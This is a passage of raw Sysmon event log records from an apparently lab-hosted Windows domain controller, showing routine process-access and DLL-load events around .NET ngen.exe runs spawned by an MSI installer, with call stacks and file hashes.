14:57:22.921{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-5E0C-00000000BB01}1572c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.921{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-5C0C-00000000BB01}3308c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.921{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-5C0C-00000000BB01}3308c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.921{A7A01FEF-EBD2-607E-5C0C-00000000BB01}3308C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.889{A7A01FEF-EBD2-607E-5D0C-00000000BB01}18523252C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-5C0C-00000000BB01}3308c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.889{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-5D0C-00000000BB01}1852C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.889{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-5C0C-00000000BB01}3308c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.889{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-5C0C-00000000BB01}3308c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.874{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-5A0C-00000000BB01}4744c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.874{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-5A0C-00000000BB01}4744c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.874{A7A01FEF-EBD2-607E-5A0C-00000000BB01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.858{A7A01FEF-EBD2-607E-5B0C-00000000BB01}50847048C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-5A0C-00000000BB01}4744c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.843{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-5B0C-00000000BB01}5084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.843{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-5A0C-00000000BB01}4744c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.843{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-5A0C-00000000BB01}4744c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.827{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-580C-00000000BB01}4640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.827{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-580C-00000000BB01}4640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.827{A7A01FEF-EBD2-607E-580C-00000000BB01}4640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000074099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.811{A7A01FEF-EBD2-607E-590C-00000000BB01}33843000C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-580C-00000000BB01}4640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.811{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-590C-00000000BB01}3384C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.796{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-580C-00000000BB01}4640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.796{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-580C-00000000BB01}4640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.796{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-560C-00000000BB01}5616c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.796{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-560C-00000000BB01}5616c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000074093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.796{A7A01FEF-EBD2-607E-560C-00000000BB01}5616C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000074092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.764{A7A01FEF-EBD2-607E-570C-00000000BB01}52604888C:\Windows\system32\conhost.exe{A7A01FEF-EBD2-607E-560C-00000000BB01}5616c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.764{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-570C-00000000BB01}5260C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.749{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD2-607E-560C-00000000BB01}5616c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000074089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.749{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD2-607E-560C-00000000BB01}5616c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000074088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.749{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-540C-00000000BB01}1580c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000074087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:22.749{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD2-607E-540C-00000000BB01}1580c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM3